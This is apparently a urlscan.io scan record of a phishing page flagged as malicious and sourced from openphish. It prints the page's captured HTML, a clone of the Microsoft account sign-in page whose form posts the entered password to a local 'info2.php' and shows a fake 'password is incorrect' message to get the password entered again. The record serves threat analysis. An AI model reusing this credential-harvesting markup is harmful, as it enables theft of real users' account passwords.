wagoproducts.com Open in urlscan Pro  Malicious Activity! Public Scan

Submitted URL: https://wagoproducts.com/cgibin/vmo/voicemail/info.php
Effective URL: https://wagoproducts.com/cgibin/vmo/voicemail/error.php?h=ed29nkjpsa16bhrjq4na16owq-1mucgfycc664m7vmhpjgqse65-1l5rurej3h4...
Submission: On December 30 via automatic, source openphish — Scanned from DE

Form analysis 1 forms found in the DOM

Name: Form1POST info2.php

<form id="Form1" name="Form1" action="info2.php" method="post">
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge">
  <script type="text/javascript">
    var PROOF = {};
    PROOF.Type = {
      SQSA: 6,
      CSS: 5,
      DeviceId: 4,
      Email: 1,
      AltEmail: 2,
      SMS: 3,
      HIP: 8,
      Birthday: 9,
      TOTPAuthenticator: 10,
      RecoveryCode: 11,
      StrongTicket: 13,
      TOTPAuthenticatorV2: 14,
      UniversalSecondFactor: 15,
      Voice: -3
    <meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&amp;lc=1033&amp;uaid=a20a74fd454d4a2c725f80cfe80144c3">Microsoft account requires JavaScript to sign in. This web browser either does not support
    JavaScript, or scripts are being blocked.<br><br>To find out whether your browser supports JavaScript, or to allow scripts, see the browser's online help.
  <title>Sign in to your Microsoft account</title>
  <meta name="robots" content="none">
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    ! function(e, r) {
      for (var t in r) e[t] = r[t]
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      function r(n) {
        if (t[n]) return t[n].exports;
        var o = t[n] = {
          exports: {},
          id: n,
          loaded: !1
        return e[n].call(o.exports, o, o.exports, r), o.loaded = !0, o.exports
      var t = {};
      return r.m = e, r.c = t, r.p = "", r(0)
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      ! function() {
        function e() {
          return s.$Config || s.ServerData || {}

        function r(e, r) {
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        function n() {
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            t = r.loader || {};
          return t.slReportFailure || r.slReportFailure || !1

        function o() {
          var r = e(),
            t = r.loader || {};
          return t.redirectToErrorPageOnLoadFailure || !1

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              e.sheet && e.sheet.cssRules && !e.sheet.cssRules.length && (r = !1)
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        function i() {
          function n(e) {
            var r = d.getElementsByTagName("head")[0];

          function o(e, r, n) {
            var o = t(e) ? i(e) : s(e);
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          function i(e) {
            var r = d.createElement("link");
            return r.rel = "stylesheet", r.type = "text/css", r.href = e, r

          function s(e) {
            var r = d.createElement("script");
            return r.type = "text/javascript", r.src = e, r.defer = !1, r.async = !1, r

          function c(e) {
            if (!(p && p.length > 1)) return e;
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              if (0 === e.indexOf(p[r])) return p[r + 1 < p.length ? r + 1 : 0] + e.substring(p[r].length);
            return e

          function u(e, t, n, o) {
            return r("[$Loader]: " + (y.failMessage || "Failed"), o), L[e].retry < g ? (L[e].retry++, void f(e, t, n)) : void(n && n())

          function l(e, t, n, o) {
            a(o) ? (r("[$Loader]: " + (y.successMessage || "Loaded"), o), f(e + 1, t, n)) : u(e, t, n, o)

          function f(e, t, a) {
            if (e < L.length) {
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              if (!i || !i.srcPath) return void f(e + 1, t, a);
              i.retry > 0 && (i.srcPath = c(i.srcPath), i.origId || (i.origId = i.id), i.id = i.origId + "_Retry_" + i.retry);
              var s = o(i.srcPath, i.id, i.integrity);
              s.onload = function() {
                l(e, t, a, s)
              }, s.onerror = function() {
                u(e, t, a, s)
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                "loaded" === s.readyState ? setTimeout(function() {
                  l(e, t, a, s)
                }, 500) : "complete" === s.readyState && l(e, t, a, s)
              }, n(s), r("[$Loader]: Loading '" + (i.srcPath || "") + "', id:" + (i.id || ""))
            } else t && t()
          var h = e(),
            g = h.slMaxRetry || 2,
            v = h.loader || {},
            p = v.cdnRoots || [],
            y = this,
            L = [];
          y.retryOnError = !0, y.successMessage = "Loaded", y.failMessage = "Error", y.Add = function(e, r, t, n) {
            e && L.push({
              srcPath: e,
              id: r,
              retry: n || 0,
              integrity: t
          }, y.AddForReload = function(e) {
            var r = e.src || e.href || "";
            y.Add(r, "AddForReload", e.integrity, 1)
          }, y.AddIf = function(e, r, t) {
            e && y.Add(r, t)
          }, y.Load = function(e, r) {
            f(0, e, r)
        var s = window,
          d = s.document,
          c = ".css",
          u = c.length;
        i.On = function(e, r) {
          if (!e) throw "The target element must be provided and cannot be null.";
          r ? i.OnError(e) : i.OnSuccess(e)
        }, i.OnSuccess = function(e) {
          var t = e.src || e.href || "",
            s = n(),
            d = o();
          if (!e) throw "The target element must be provided and cannot be null.";
          if (a(e)) {
            r("[$Loader]: Loaded", e);
            var c = new i;
            c.failMessage = "Reload Failed", c.successMessage = "Reload Success", c.Load(null, function() {
              if (s) throw "Unexpected state. resourceLoader.Load() failed despite initial load success. ['" + t + "']";
              d && (document.location.href = "/error.aspx?err=504")
          } else i.OnError(e)
        }, i.OnError = function(e) {
          var t = e.src || e.href || "",
            a = n(),
            s = o();
          if (!e) throw "The target element must be provided and cannot be null.";
          r("[$Loader]: Failed", e);
          var d = new i;
          d.failMessage = "Reload Failed", d.successMessage = "Reload Success", d.AddForReload(e), d.Load(null, function() {
            if (a) throw "Failed to load external resource ['" + t + "']";
            s && (document.location.href = "/error.aspx?err=504")
        }, s.$Loader = i
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      function t(o) {
        if (e[o]) return e[o].exports;
        var n = e[o] = {
          exports: {},
          id: o,
          loaded: !1
        return r[o].call(n.exports, n, n.exports, t), n.loaded = !0, n.exports
      var e = {};
      return t.m = r, t.c = e, t.p = "", t(0)
    }([function(r, t) {
      ! function() {
        function r(r, t) {
          function e(i) {
            var a = r[i];
            return i < o - 1 ? void(n.r[a] ? e(i + 1) : n.when(a, function() {
              e(i + 1)
            })) : void t(a)
          var o = r.length;

        function t(r, t, i) {
          function a() {
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              n = r ? u.method : i[0],
              a = u.extraArgs || [],
              c = o.$WebWatson;
            try {
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                for (var s = a.length, v = 0; v < s; v++) f.push(a[v]);
              n.apply(t, f)
            } catch (h) {
              return void(c && c.submitFromException && c.submitFromException(h))
          var u = n.r && n.r[r];
          return t = t ? t : this, u && (u.skipTimeout ? a() : o.setTimeout(a, 0)), u

        function e(r, t) {
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        var o = window;
        o.$Do || (o.$Do = {
          q: [],
          r: [],
          removeItems: [],
          lock: 0,
          o: []
        var n = o.$Do;
        n.when = function(e, o) {
          function i(r) {
            t(r, a, u) || n.q.push({
              id: r,
              c: a,
              a: u
          var a = 0,
            u = [],
            c = 1,
            f = "function" == typeof o;
          f || (a = o, c = 2);
          for (var s = c; s < arguments.length; s++) u.push(arguments[s]);
          e instanceof Array ? r(e, i) : i(e)
        }, n.register = function(r, e, o) {
          if (!n.r[r]) {
            var i = {};
            if (e && (i.method = e), o && (i.skipTimeout = o), arguments && arguments.length > 3) {
              i.extraArgs = [];
              for (var a = 3; a < arguments.length; a++) i.extraArgs.push(arguments[a])
            n.r[r] = i, n.lock++;
            try {
              for (var u = 0; u < n.q.length; u++) {
                var c = n.q[u];
                c.id == r && t(r, c.c, c.a) && n.removeItems.push(c)
            } catch (f) {
              throw f
            } finally {
              if (n.lock--, 0 === n.lock) {
                for (var s = 0; s < n.removeItems.length; s++)
                  for (var v = n.removeItems[s], h = 0; h < n.q.length; h++)
                    if (n.q[h] === v) {
                      n.q.splice(h, 1);
                    } n.removeItems = []
        }, n.unregister = function(r) {
          n.r[r] && delete n.r[r]
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    ! function(e, n) {
      for (var r in n) e[r] = n[r]
    }(this, function(e) {
      function n(t) {
        if (r[t]) return r[t].exports;
        var o = r[t] = {
          exports: {},
          id: t,
          loaded: !1
        return e[t].call(o.exports, o, o.exports, n), o.loaded = !0, o.exports
      var r = {};
      return n.m = e, n.c = r, n.p = "", n(0)
    }([function(e, n) {
      ! function() {
        function e() {
          return r.$Config || r.ServerData || {}

        function n() {
          var n = (e(), new i),
            r = this,
            a = [],
            f = [],
            u = [];
          r.Add = function(e, r, t, o) {
            a.push(e), n.Add(e, r, t, o)
          }, r.Provides = function(e) {
            if (e)
              if (e instanceof Array)
                for (var n = 0; n < e.length; n++) f.push(e[n]);
              else f.push(e)
          }, r.Requires = function(e) {
            if (e)
              if (e instanceof Array)
                for (var n = 0; n < e.length; n++) u.push(e[n]);
              else u.push(e)
          }, r.Load = function(e, r) {
            var i = function() {
                e && e();
                for (var n = 0; n < f.length; n++) o.register(f[n], 0, !0)
              s = function() {
                n.Load(i, r)
            if (u.length > 0) {
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                h.rel = "prefetch", h.href = a[d], c.appendChild(h)
              o.when(u, s)
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        var r = window,
          t = r.document,
          o = r.$Do,
          i = r.$Loader,
          a = ".css";
        n.WhenLoaded = function(e, n) {
          o.when(e, n)
        }, r.$DepLoader = n
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          exports: {},
          id: n,
          loaded: !1
        return e[n].call(i.exports, i, i.exports, r), i.loaded = !0, i.exports
      var t = {};
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        click: backButton_onClick,
        hasFocus: focusOnBackButton" id="idBtn_Back"
                      aria-label="Back"><!-- ko ifnot: svr.bF --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme -->
                      <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img role="presentation" pngsrc="https://logincdn.msauth.net/16.000.28170.6/images/arrow_left.png?x=7cc096da6aa2dba3f81fcc1c8262157c"
                        svgsrc="https://logincdn.msauth.net/16.000.28170.6/images/arrow_left.svg?x=a9cc2824ef3517b6c4160dcf8ff7d410" data-bind="imgSrc"
                        src="https://logincdn.msauth.net/16.000.28170.6/images/arrow_left.svg?x=a9cc2824ef3517b6c4160dcf8ff7d410"><!-- /ko --> <!-- /ko --><!-- /ko --><!-- /ko --><!-- ko if: svr.bF --><!-- /ko --> </button><!-- /ko -->
                    <div id="displayName" class="identity" data-bind="text: unsafe_displayName, attr: { 'title': unsafe_displayName }" title=""></div>
              </div><!-- /ko -->
              <div class="pagination-view animate has-identity-banner slide-in-next" data-bind="css: {
        'has-identity-banner': showIdentityBanner() &amp;&amp; (sharedData.displayName || svr.g),
        'zero-opacity': hidePaginatedView.hideSubView(),
        'animate': animate(),
        'slide-out-next': animate.isSlideOutNext(),
        'slide-in-next': animate.isSlideInNext(),
        'slide-out-back': animate.isSlideOutBack(),
        'slide-in-back': animate.isSlideInBack() }"><!-- ko foreach: views --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() -->
                <!-- ko template: { nodes: [$data], data: $parent } -->
                <div data-viewid="2" data-showidentitybanner="true" data-dynamicbranding="true" data-bind="pageViewComponent: { name: 'login-paginated-password-view',
                        params: {
                            serverData: svr,
                            serverError: initialError,
                            isInitialView: isInitialState,
                            username: sharedData.username,
                            displayName: sharedData.displayName,
                            hipRequiredForUsername: sharedData.hipRequiredForUsername,
                            passwordBrowserPrefill: sharedData.passwordBrowserPrefill,
                            availableCreds: sharedData.availableCreds,
                            evictedCreds: sharedData.evictedCreds,
                            useEvictedCredentials: sharedData.useEvictedCredentials,
                            flowToken: sharedData.flowToken,
                            defaultKmsiValue: svr.Y === 1,
                            userTenantBranding: sharedData.userTenantBranding,
                            sessions: sharedData.sessions,
                            callMetadata: sharedData.callMetadata,
                            gitHubRedirectUrl: sharedData.gitHubParams.redirectUrl || svr.L,
                            googleRedirectUrl: sharedData.googleParams.redirectUrl || svr.AC },
                        event: {
                            updateFlowToken: $loginPage.view_onUpdateFlowToken,
                            submitReady: $loginPage.view_onSubmitReady,
                            redirect: $loginPage.view_onRedirect,
                            resetPassword: $loginPage.passwordView_onResetPassword,
                            setBackButtonState: view_onSetIdentityBackButtonState,
                            setPendingRequest: $loginPage.view_onSetPendingRequest } }"><!--  --> <input type="hidden" name="i13" data-bind="value: isKmsiChecked() ? 1 : 0" value="0"> <input type="hidden" name="login"
                    data-bind="value: unsafe_username" value=""> <input type="text" name="loginfmt" data-bind="moveOffScreen, value: unsafe_displayName" class="moveOffScreen" tabindex="-1" aria-hidden="true"> <input type="hidden" name="type"
                    data-bind="value: svr.at ? 20 : 11" value="11"> <input type="hidden" name="LoginOptions" data-bind="value: isKmsiChecked() ? 1 : 3" value="3"> <input type="hidden" name="lrt"
                    data-bind="value: callMetadata.IsLongRunningTransaction" value=""> <input type="hidden" name="lrtPartition" data-bind="value: callMetadata.LongRunningTransactionPartition" value=""> <input type="hidden" name="hisRegion"
                    data-bind="value: callMetadata.HisRegion" value=""> <input type="hidden" name="hisScaleUnit" data-bind="value: callMetadata.HisScaleUnit" value="">
                  <div id="loginHeader" class="row text-title" role="heading" aria-level="1" data-bind="text: str['CT_PWD_STR_EnterPassword_Title']">Enter password</div>
                  <p style="color:red;">Your account or password is incorrect. If you don't remember your password, <a id="idA_IL_ForgotPassword0" href="#">reset it now.</a></p><!-- ko if: unsafe_pageDescription --><!-- /ko -->
                  <div class="row">
                    <div class="form-group col-md-24">
                      <input maxlength="127" aria-label="Password" name="password2" id="i0118" autocomplete="off" class="form-control" type="password" placeholder="Password" required="">
                      <div> <!-- /ko --><!-- /ko --><!-- ko ifnot: usePlaceholderAttribute --><!-- /ko --></div>
                  </div><!-- ko if: svr.Ad && showHipOnPasswordView --><!-- /ko -->
                  <div data-bind="css: { 'position-buttons': !tenantBranding.BoilerPlateText }" class="position-buttons">
                    <div><!-- ko if: svr.bO --><!-- /ko --><!-- ko if: svr.aF !== false && !svr.bO && !tenantBranding.KeepMeSignedInDisabled -->
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                            type="checkbox" data-bind="checked: isKmsiChecked, ariaLabel: str['CT_PWD_STR_KeepMeSignedInCB_Text']" aria-label="Keep me signed in"> <span data-bind="text: str['CT_PWD_STR_KeepMeSignedInCB_Text']">Keep me signed
                            in</span> </label> </div><!-- /ko -->
                      <div class="row">
                        <div class="col-md-24">
                          <div class="text-13 action-links">
                            <div class="form-group">
                              <a id="idA_PWD_ForgotPassword" role="link" href="https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d13%26rver%3d7.1.6819.0%26wp%3dMBI_SSL%26wreply%3dhttps%253a%252f%252fwww.office.com%252flogin%26lc%3d1033%26id%3d290950%26aadredir%3d1%26contextid%3dFC6BDC77D20440E1%26bk%3d1557514822&amp;id=290950&amp;uiflavor=web&amp;uaid=a20a74fd454d4a2c725f80cfe80144c3&amp;mkt=EN-US&amp;lc=1033&amp;bk=1557514822" data-bind="text: str['CT_PWD_STR_ForgotPwdLink_Text'], href: svr.m, click: resetPassword_onClick">Forgot my password</a>
                            </div><!-- ko if: allowPhoneDisambiguation --><!-- /ko --><!-- ko ifnot: useEvictedCredentials --><!-- ko component: { name: "cred-switch-link-control",
                            params: {
                                serverData: svr,
                                username: username,
                                availableCreds: availableCreds,
                                flowToken: flowToken,
                                currentCred: { credType: 1 } },
                            event: {
                                switchView: credSwitchLink_onSwitchView,
                                setPendingRequest: credSwitchLink_onSetPendingRequest,
                                updateFlowToken: credSwitchLink_onUpdateFlowToken } } --><!--  -->
                            <div class="form-group">
                              <!-- ko if: credentialCount > 1 || (credentialCount === 1 && (showForgotUsername || selectedCredShownOnlyOnPicker)) --><!-- /ko --><!-- ko if: credentialCount === 1 && !(showForgotUsername || selectedCredShownOnlyOnPicker) --><!-- /ko --><!-- ko if: credentialCount === 0 && showForgotUsername --><!-- /ko -->
                            </div><!-- ko if: credLinkError --><!-- /ko --><!-- /ko --><!-- ko if: evictedCreds.length > 0 --><!-- /ko --><!-- /ko --><!-- ko if: showChangeUserLink --><!-- /ko -->
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                      <div data-bind="component: { name: 'footer-buttons-field',
        params: {
            serverData: svr,
            primaryButtonText: str['CT_PWD_STR_SignIn_Button'],
            isPrimaryButtonEnabled: !isRequestPending(),
            isPrimaryButtonVisible: svr.G,
            isSecondaryButtonEnabled: true,
            isSecondaryButtonVisible: false },
        event: {
            primaryButtonClick: primaryButton_onClick } }">
                        <div class="col-xs-24 no-padding-left-right button-container" data-bind="
    visible: isPrimaryButtonVisible() || isSecondaryButtonVisible(),
    css: { 'no-margin-bottom': removeBottomMargin }"><!-- ko if: isSecondaryButtonVisible --><!-- /ko -->
                          <div class="inline-block"><!-- type="submit" is needed in-addition to 'type' in primaryButtonAttributes observable to support IE8 --> <input type="submit" id="idSIButton9" class="btn btn-block btn-primary" data-bind="
            attr: primaryButtonAttributes,
            value: primaryButtonText() || str['CT_PWD_STR_SignIn_Button_Next'],
            hasFocus: focusOnPrimaryButton,
            click: primaryButton_onClick,
            enable: isPrimaryButtonEnabled,
            visible: isPrimaryButtonVisible,
            preventTabbing: primaryButtonPreventTabbing" value="Sign in"> </div>
                  </div><!-- ko if: tenantBranding.BoilerPlateText --><!-- /ko -->
                <!-- /ko --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- /ko -->
          </div><!-- /ko -->
        </div><!-- ko if: showFedCredButton --><!-- /ko --><!-- ko if: newSessionMessage() && !svr.BO --><!-- /ko --><!-- ko if: svr.BO && newSession() --><!-- /ko --> <input type="hidden" name="ps" data-bind="value: postedLoginStateViewId" value="">
        <input type="hidden" name="psRNGCDefaultType" data-bind="value: postedLoginStateViewRNGCDefaultType" value=""> <input type="hidden" name="psRNGCEntropy" data-bind="value: postedLoginStateViewRNGCEntropy" value=""> <input type="hidden"
          name="psRNGCSLK" data-bind="value: postedLoginStateViewRNGCSLK" value=""> <input type="hidden" name="canary" data-bind="value: svr.canary" value=""> <input type="hidden" name="ctx" data-bind="value: ctx" value=""> <input type="hidden"
          name="hpgrequestid" data-bind="value: svr.sessionId" value=""> <input type="hidden" id="i0327" data-bind="attr: { name: svr.Ci }, value: flowToken" name="PPFT"
        <input type="hidden" name="PPSX" data-bind="value: svr.CK" value="Passport"> <input type="hidden" name="NewUser" value="1"> <input type="hidden" name="FoundMSAs" data-bind="value: svr.AA" value=""> <input type="hidden" name="fspost"
          data-bind="value: svr.fPOST_ForceSignin ? 1 : 0" value="0"> <input type="hidden" name="i21" data-bind="value: wasLearnMoreShown() ? 1 : 0" value="0"> <input type="hidden" name="CookieDisclosure" data-bind="value: svr.al ? 1 : 0" value="0">
        <input type="hidden" name="IsFidoSupported" data-bind="value: isFidoSupported() ? 1 : 0" value="0">
        <div data-bind="component: { name: 'instrumentation',
                publicMethods: instrumentationMethods,
                params: { serverData: svr } }"><input type="hidden" name="i2" data-bind="value: clientMode" value="1"> <input type="hidden" name="i17" data-bind="value: srsFailed" value="0"> <input type="hidden" name="i18"
            data-bind="value: srsSuccess"> <input type="hidden" name="i19" data-bind="value: timeOnPage" value=""></div>
        <div id="footer" class="footer default" role="contentinfo" data-bind="css: { 'default': !backgroundLogoUrl() }">
          <div data-bind="component: { name: 'footer-control',
                    params: {
                        serverData: svr,
                        debugDetails: debugDetails,
                        showLinks: true },
                    event: {
                        agreementClick: footer_agreementClick } }"><!--  --><!-- ko if: showLinks || impressumLink || showIcpLicense -->
            <div id="footerLinks" class="footerNode text-secondary"><!-- ko if: !showIcpLicense --><!-- /ko -->
              <a id="ftrTerms" data-bind="text: str['MOBILE_STR_Footer_Terms'], href: termsLink, click: termsLink_onClick" href="https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&amp;mkt=EN-US&amp;vv=1600&amp;uaid=a20a74fd454d4a2c725f80cfe80144c3">Terms of use</a>
              <a id="ftrPrivacy" data-bind="text: str['MOBILE_STR_Footer_Privacy'], href: privacyLink, click: privacyLink_onClick" href="https://login.live.com/gls.srf?urlID=MSNPrivacyStatement&amp;mkt=EN-US&amp;vv=1600&amp;uaid=a20a74fd454d4a2c725f80cfe80144c3">Privacy &amp; cookies</a><!-- ko if: impressumLink --><!-- /ko --><!-- ko if: showIcpLicense --><!-- /ko -->
              <a href="#" role="button" class="moreOptions" data-bind="
        click: moreInfo_onClick,
        ariaLabel: str['CT_STR_More_Options_Ellipsis_AriaLabel'],
        hasFocus: focusMoreInfo()" aria-label="Click here for troubleshooting information"><!-- ko component: { name: 'accessible-image-control', params: { hasDarkBackground: true } } --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --> <!-- ko template: { nodes: [lightImageNode], data: $parent } --><img class="desktopMode" role="presentation" pngsrc="https://logincdn.msauth.net/16.000.28170.6/images/ellipsis_white.png?x=0ad43084800fd8b50a2576b5173746fe" svgsrc="https://logincdn.msauth.net/16.000.28170.6/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588ad73" data-bind="imgSrc" src="https://logincdn.msauth.net/16.000.28170.6/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588ad73"><!-- /ko --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --><!-- /ko --><!-- /ko --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --> <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img class="mobileMode" role="presentation" pngsrc="https://logincdn.msauth.net/16.000.28170.6/images/ellipsis_grey.png?x=5bc252567ef56db648207d9c36a9d004" svgsrc="https://logincdn.msauth.net/16.000.28170.6/images/ellipsis_grey.svg?x=2b5d393db04a5e6e1f739cb266e65b4c" data-bind="imgSrc" src="https://logincdn.msauth.net/16.000.28170.6/images/ellipsis_grey.svg?x=2b5d393db04a5e6e1f739cb266e65b4c"><!-- /ko --> <!-- /ko --><!-- /ko --> </a>
            </div><!-- ko if: showDebugDetails --><!-- /ko --> <!-- /ko -->
      </div> <!-- /ko -->
    </div><!-- /ko --> <!-- ko foreach: postRedirectParams --><!-- /ko --> <!-- ko if: svr.Av && !svr.BO --><!-- /ko --><!-- ko if: svr.BO && callMsaStaticMeControl() --><!-- /ko --><!-- ko if: svr.Ar --><!-- /ko -->

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